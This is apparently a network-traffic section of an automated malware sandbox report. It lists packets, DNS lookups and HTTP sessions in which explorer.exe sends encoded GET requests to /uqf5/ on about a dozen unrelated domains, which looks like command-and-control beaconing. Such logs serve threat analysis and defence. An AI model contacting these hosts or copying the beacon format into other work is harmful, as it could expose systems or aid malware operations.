                                                                          Jun 11, 2021 15:02:28.559231997 CEST8049729151.101.0.119192.168.2.7
                                                                          Jun 11, 2021 15:02:33.724452972 CEST4973080192.168.2.7162.241.253.69
                                                                          Jun 11, 2021 15:02:33.885122061 CEST8049730162.241.253.69192.168.2.7
                                                                          Jun 11, 2021 15:02:33.885230064 CEST4973080192.168.2.7162.241.253.69
                                                                          Jun 11, 2021 15:02:33.885598898 CEST4973080192.168.2.7162.241.253.69
                                                                          Jun 11, 2021 15:02:34.056637049 CEST8049730162.241.253.69192.168.2.7
                                                                          Jun 11, 2021 15:02:34.064239025 CEST8049730162.241.253.69192.168.2.7
                                                                          Jun 11, 2021 15:02:34.064285994 CEST8049730162.241.253.69192.168.2.7
                                                                          Jun 11, 2021 15:02:34.064496994 CEST4973080192.168.2.7162.241.253.69
                                                                          Jun 11, 2021 15:02:34.064538002 CEST4973080192.168.2.7162.241.253.69
                                                                          Jun 11, 2021 15:02:34.225109100 CEST8049730162.241.253.69192.168.2.7
                                                                          Jun 11, 2021 15:02:39.197911024 CEST4973680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:02:39.240071058 CEST804973634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:02:39.242655993 CEST4973680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:02:39.242866039 CEST4973680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:02:39.284816027 CEST804973634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:02:39.380528927 CEST804973634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:02:39.380544901 CEST804973634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:02:39.380672932 CEST4973680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:02:39.380791903 CEST4973680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:02:39.422661066 CEST804973634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:02:44.466555119 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:44.697666883 CEST8049737156.241.53.127192.168.2.7
                                                                          Jun 11, 2021 15:02:44.697839022 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:44.697962046 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:44.928677082 CEST8049737156.241.53.127192.168.2.7
                                                                          Jun 11, 2021 15:02:45.199877977 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:45.469887018 CEST8049737156.241.53.127192.168.2.7
                                                                          Jun 11, 2021 15:02:45.473994017 CEST8049737156.241.53.127192.168.2.7
                                                                          Jun 11, 2021 15:02:45.474014044 CEST8049737156.241.53.127192.168.2.7
                                                                          Jun 11, 2021 15:02:45.474118948 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:45.474155903 CEST4973780192.168.2.7156.241.53.127
                                                                          Jun 11, 2021 15:02:50.305583954 CEST4973880192.168.2.7184.168.131.241
                                                                          Jun 11, 2021 15:02:50.500479937 CEST8049738184.168.131.241192.168.2.7
                                                                          Jun 11, 2021 15:02:50.500680923 CEST4973880192.168.2.7184.168.131.241
                                                                          Jun 11, 2021 15:02:50.500833035 CEST4973880192.168.2.7184.168.131.241
                                                                          Jun 11, 2021 15:02:50.695952892 CEST8049738184.168.131.241192.168.2.7
                                                                          Jun 11, 2021 15:02:50.718878031 CEST8049738184.168.131.241192.168.2.7
                                                                          Jun 11, 2021 15:02:50.718913078 CEST8049738184.168.131.241192.168.2.7
                                                                          Jun 11, 2021 15:02:50.719070911 CEST4973880192.168.2.7184.168.131.241
                                                                          Jun 11, 2021 15:02:50.719149113 CEST4973880192.168.2.7184.168.131.241
                                                                          Jun 11, 2021 15:02:50.913141966 CEST8049738184.168.131.241192.168.2.7
                                                                          Jun 11, 2021 15:02:55.855372906 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:02:55.899477959 CEST8049739104.21.64.212192.168.2.7
                                                                          Jun 11, 2021 15:02:55.900799036 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:02:55.901098967 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:02:55.945395947 CEST8049739104.21.64.212192.168.2.7
                                                                          Jun 11, 2021 15:02:56.303220987 CEST8049739104.21.64.212192.168.2.7
                                                                          Jun 11, 2021 15:02:56.303244114 CEST8049739104.21.64.212192.168.2.7
                                                                          Jun 11, 2021 15:02:56.303296089 CEST8049739104.21.64.212192.168.2.7
                                                                          Jun 11, 2021 15:02:56.303396940 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:02:56.303426981 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:02:56.303518057 CEST4973980192.168.2.7104.21.64.212
                                                                          Jun 11, 2021 15:03:01.381918907 CEST4974680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:03:01.424647093 CEST804974634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:03:01.424876928 CEST4974680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:03:01.424962997 CEST4974680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:03:01.466937065 CEST804974634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:03:01.563910007 CEST804974634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:03:01.563935995 CEST804974634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:03:01.564239979 CEST4974680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:03:01.564289093 CEST4974680192.168.2.734.102.136.180
                                                                          Jun 11, 2021 15:03:01.606385946 CEST804974634.102.136.180192.168.2.7
                                                                          Jun 11, 2021 15:03:06.679408073 CEST4975280192.168.2.745.140.167.161
                                                                          Jun 11, 2021 15:03:06.761852026 CEST804975245.140.167.161192.168.2.7
                                                                          Jun 11, 2021 15:03:06.761985064 CEST4975280192.168.2.745.140.167.161
                                                                          Jun 11, 2021 15:03:06.762137890 CEST4975280192.168.2.745.140.167.161
                                                                          Jun 11, 2021 15:03:06.846729994 CEST804975245.140.167.161192.168.2.7
                                                                          Jun 11, 2021 15:03:06.846755028 CEST804975245.140.167.161192.168.2.7
                                                                          Jun 11, 2021 15:03:06.846764088 CEST804975245.140.167.161192.168.2.7
                                                                          Jun 11, 2021 15:03:06.846957922 CEST4975280192.168.2.745.140.167.161
                                                                          Jun 11, 2021 15:03:06.847050905 CEST4975280192.168.2.745.140.167.161
                                                                          Jun 11, 2021 15:03:06.929241896 CEST804975245.140.167.161192.168.2.7
                                                                          Jun 11, 2021 15:03:12.183099031 CEST4975380192.168.2.7160.16.235.37
                                                                          Jun 11, 2021 15:03:12.500047922 CEST8049753160.16.235.37192.168.2.7
                                                                          Jun 11, 2021 15:03:12.500157118 CEST4975380192.168.2.7160.16.235.37
                                                                          Jun 11, 2021 15:03:12.500335932 CEST4975380192.168.2.7160.16.235.37
                                                                          Jun 11, 2021 15:03:12.824491978 CEST8049753160.16.235.37192.168.2.7
                                                                          Jun 11, 2021 15:03:13.015091896 CEST4975380192.168.2.7160.16.235.37
                                                                          Jun 11, 2021 15:03:13.179290056 CEST8049753160.16.235.37192.168.2.7
                                                                          Jun 11, 2021 15:03:13.179346085 CEST8049753160.16.235.37192.168.2.7
                                                                          Jun 11, 2021 15:03:13.179480076 CEST4975380192.168.2.7160.16.235.37
                                                                          Jun 11, 2021 15:03:13.179522038 CEST4975380192.168.2.7160.16.235.37

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jun 11, 2021 15:01:05.177478075 CEST53508488.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:05.897979021 CEST6124253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:05.959697008 CEST53612428.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:06.743117094 CEST5856253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:06.796161890 CEST53585628.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:06.812563896 CEST5659053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:06.875586987 CEST53565908.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:07.876682997 CEST6050153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:07.929701090 CEST53605018.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:08.693548918 CEST5377553192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:08.744138956 CEST53537758.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:10.295377970 CEST5183753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:10.346415997 CEST53518378.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:11.355870962 CEST5541153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:11.410727024 CEST53554118.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:12.205920935 CEST6366853192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:12.258956909 CEST53636688.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:13.037837982 CEST5464053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:13.088531017 CEST53546408.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:14.831624031 CEST5873953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:14.881788015 CEST53587398.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:16.358023882 CEST6033853192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:16.418981075 CEST53603388.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:17.480354071 CEST5871753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:17.538949966 CEST53587178.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:18.463524103 CEST5976253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:18.522057056 CEST53597628.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:19.502006054 CEST5432953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:19.553842068 CEST53543298.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:20.391136885 CEST5805253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:20.444854975 CEST53580528.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:21.614422083 CEST5400853192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:21.670382977 CEST53540088.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:22.619143963 CEST5945153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:22.669414997 CEST53594518.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:23.962366104 CEST5291453192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:24.012793064 CEST53529148.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:24.788630962 CEST6456953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:24.839795113 CEST53645698.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:26.421053886 CEST5281653192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:26.474507093 CEST53528168.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:27.944726944 CEST5078153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:27.995223045 CEST53507818.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:29.080718994 CEST5423053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:29.140707970 CEST53542308.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:01:42.155872107 CEST5491153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:01:42.222920895 CEST53549118.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:01.328617096 CEST4995853192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:01.390433073 CEST53499588.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:23.026298046 CEST5086053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:23.098263025 CEST53508608.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:24.204824924 CEST5045253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:24.265928984 CEST53504528.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:24.752355099 CEST5973053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:24.810847998 CEST53597308.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:28.253508091 CEST5931053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:28.314877987 CEST53593108.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:33.532628059 CEST5191953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:33.722217083 CEST53519198.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:37.484868050 CEST6429653192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:37.548674107 CEST53642968.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:39.128118038 CEST5668053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:39.196547985 CEST53566808.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:44.393404961 CEST5882053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:44.465208054 CEST53588208.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:50.241206884 CEST6098353192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:50.304538012 CEST53609838.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:55.763794899 CEST4924753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:55.854321957 CEST53492478.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:57.227232933 CEST5228653192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:57.558588982 CEST53522868.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:58.078527927 CEST5606453192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:58.150332928 CEST53560648.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:58.299998045 CEST6374453192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:58.358923912 CEST53637448.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:02:59.172753096 CEST6145753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:02:59.396074057 CEST53614578.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:00.137270927 CEST5836753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:00.198405981 CEST53583678.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:01.104094028 CEST6059953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:01.163064957 CEST53605998.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:01.314871073 CEST5957153192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:01.378590107 CEST53595718.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:02.057399988 CEST5268953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:02.116549015 CEST53526898.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:02.653374910 CEST5029053192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:02.712276936 CEST53502908.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:04.352818966 CEST6042753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:04.411262989 CEST53604278.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:05.485431910 CEST5620953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:05.536890030 CEST53562098.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:06.129554987 CEST5958253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:06.188199997 CEST53595828.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:06.580559015 CEST6094953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:06.678253889 CEST53609498.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:11.884677887 CEST5854253192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:12.181862116 CEST53585428.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:18.036056042 CEST5917953192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:18.101866007 CEST53591798.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:23.564357996 CEST6092753192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:23.635313988 CEST53609278.8.8.8192.168.2.7
                                                                          Jun 11, 2021 15:03:28.908108950 CEST5785453192.168.2.78.8.8.8
                                                                          Jun 11, 2021 15:03:29.002484083 CEST53578548.8.8.8192.168.2.7

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jun 11, 2021 15:02:23.026298046 CEST192.168.2.78.8.8.80x39eaStandard query (0)www.prltoday.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:28.253508091 CEST192.168.2.78.8.8.80x14feStandard query (0)www.gorditasdemaiz.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:33.532628059 CEST192.168.2.78.8.8.80xdff4Standard query (0)www.mexicobeachselfstorage.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:39.128118038 CEST192.168.2.78.8.8.80xa3b0Standard query (0)www.tylerrucarean.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:44.393404961 CEST192.168.2.78.8.8.80x236fStandard query (0)www.cgjanvier.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:50.241206884 CEST192.168.2.78.8.8.80xcfa8Standard query (0)www.flockuplabs.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:55.763794899 CEST192.168.2.78.8.8.80x1514Standard query (0)www.culturalinterface.netA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:01.314871073 CEST192.168.2.78.8.8.80x60e8Standard query (0)www.toolbnbapp.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:06.580559015 CEST192.168.2.78.8.8.80x4898Standard query (0)www.trainup-wall.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:11.884677887 CEST192.168.2.78.8.8.80xfe17Standard query (0)www.paolograssino.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:18.036056042 CEST192.168.2.78.8.8.80xbf6cStandard query (0)www.a-prime-india-demataccount.zoneA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.564357996 CEST192.168.2.78.8.8.80x7819Standard query (0)www.homeanddesignstudio.comA (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:28.908108950 CEST192.168.2.78.8.8.80xae66Standard query (0)www.stays.travelA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jun 11, 2021 15:02:23.098263025 CEST8.8.8.8192.168.2.70x39eaNo error (0)www.prltoday.com213.186.33.5A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:24.265928984 CEST8.8.8.8192.168.2.70xf143No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:02:28.314877987 CEST8.8.8.8192.168.2.70x14feNo error (0)www.gorditasdemaiz.com151.101.0.119A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:33.722217083 CEST8.8.8.8192.168.2.70xdff4No error (0)www.mexicobeachselfstorage.commexicobeachselfstorage.comCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:02:33.722217083 CEST8.8.8.8192.168.2.70xdff4No error (0)mexicobeachselfstorage.com162.241.253.69A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:39.196547985 CEST8.8.8.8192.168.2.70xa3b0No error (0)www.tylerrucarean.comtylerrucarean.comCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:02:39.196547985 CEST8.8.8.8192.168.2.70xa3b0No error (0)tylerrucarean.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:44.465208054 CEST8.8.8.8192.168.2.70x236fNo error (0)www.cgjanvier.com156.241.53.127A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:50.304538012 CEST8.8.8.8192.168.2.70xcfa8No error (0)www.flockuplabs.comflockuplabs.comCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:02:50.304538012 CEST8.8.8.8192.168.2.70xcfa8No error (0)flockuplabs.com184.168.131.241A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:55.854321957 CEST8.8.8.8192.168.2.70x1514No error (0)www.culturalinterface.net104.21.64.212A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:02:55.854321957 CEST8.8.8.8192.168.2.70x1514No error (0)www.culturalinterface.net172.67.187.224A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:01.378590107 CEST8.8.8.8192.168.2.70x60e8No error (0)www.toolbnbapp.comtoolbnbapp.comCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:01.378590107 CEST8.8.8.8192.168.2.70x60e8No error (0)toolbnbapp.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:06.678253889 CEST8.8.8.8192.168.2.70x4898No error (0)www.trainup-wall.com45.140.167.161A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:12.181862116 CEST8.8.8.8192.168.2.70xfe17No error (0)www.paolograssino.compaolograssino.comCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:12.181862116 CEST8.8.8.8192.168.2.70xfe17No error (0)paolograssino.com160.16.235.37A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:18.101866007 CEST8.8.8.8192.168.2.70xbf6cNo error (0)www.a-prime-india-demataccount.zone172.67.155.26A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:18.101866007 CEST8.8.8.8192.168.2.70xbf6cNo error (0)www.a-prime-india-demataccount.zone104.21.42.16A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.635313988 CEST8.8.8.8192.168.2.70x7819No error (0)www.homeanddesignstudio.comwww17.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.635313988 CEST8.8.8.8192.168.2.70x7819No error (0)www17.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.635313988 CEST8.8.8.8192.168.2.70x7819No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.635313988 CEST8.8.8.8192.168.2.70x7819No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                          Jun 11, 2021 15:03:23.635313988 CEST8.8.8.8192.168.2.70x7819No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                          Jun 11, 2021 15:03:29.002484083 CEST8.8.8.8192.168.2.70xae66No error (0)www.stays.travel91.195.240.94A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • www.prltoday.com
                                                                          • www.gorditasdemaiz.com
                                                                          • www.mexicobeachselfstorage.com
                                                                          • www.tylerrucarean.com
                                                                          • www.cgjanvier.com
                                                                          • www.flockuplabs.com
                                                                          • www.culturalinterface.net
                                                                          • www.toolbnbapp.com
                                                                          • www.trainup-wall.com
                                                                          • www.paolograssino.com
                                                                          • www.a-prime-india-demataccount.zone

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.749724213.186.33.580C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:23.166137934 CEST1423OUTGET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.prltoday.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:23.234405994 CEST1423INHTTP/1.1 302 Moved Temporarily
                                                                          Server: nginx
                                                                          Date: Fri, 11 Jun 2021 13:02:23 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 138
                                                                          Connection: close
                                                                          Location: http://www.prltoday.com
                                                                          X-IPLB-Instance: 16976
                                                                          Set-Cookie: SERVERID77446=200179|YMNe4|YMNe4; path=/
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.749729151.101.0.11980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:28.365811110 CEST1541OUTGET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.gorditasdemaiz.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:28.514069080 CEST1542INHTTP/1.1 301 Moved Permanently
                                                                          server: adobe
                                                                          location: http://gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT
                                                                          cache-control: s-maxage=31536000
                                                                          x-trace-id: sAT0ESH7EmdVgwN4n3lOaOqWFb8
                                                                          x-app-name: Pro2-Renderer
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          Content-Length: 0
                                                                          Accept-Ranges: bytes
                                                                          Date: Fri, 11 Jun 2021 13:02:28 GMT
                                                                          Via: 1.1 varnish
                                                                          Age: 0
                                                                          Connection: close
                                                                          X-Served-By: cache-hhn4022-HHN
                                                                          X-Cache: MISS
                                                                          X-Cache-Hits: 0
                                                                          X-Timer: S1623416548.402593,VS0,VE103
                                                                          Vary: Fastly-SSL, X-Use-Renderer


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          10192.168.2.749754172.67.155.2680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:03:18.145966053 CEST5520OUTGET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.a-prime-india-demataccount.zone
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:03:18.554022074 CEST5521INHTTP/1.1 404 Not Found
                                                                          Date: Fri, 11 Jun 2021 13:03:18 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0a9cc486a20000c2865d0ba000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UemJ8pwfg8Bz2dxojwItmf4aQ5D7zpo3A2wjaTaS8yOEf8IrxQvson%2B26W8Gpt%2Bzq2shQRo8vwZG24MbZziDzTX3iMVad1ngOnRNfsyDmXAdxjS7GCMkKXNH8HoMU4ybIfBo49jp5Qm0FKvJS4cdyMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 65db09ea9a35c286-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
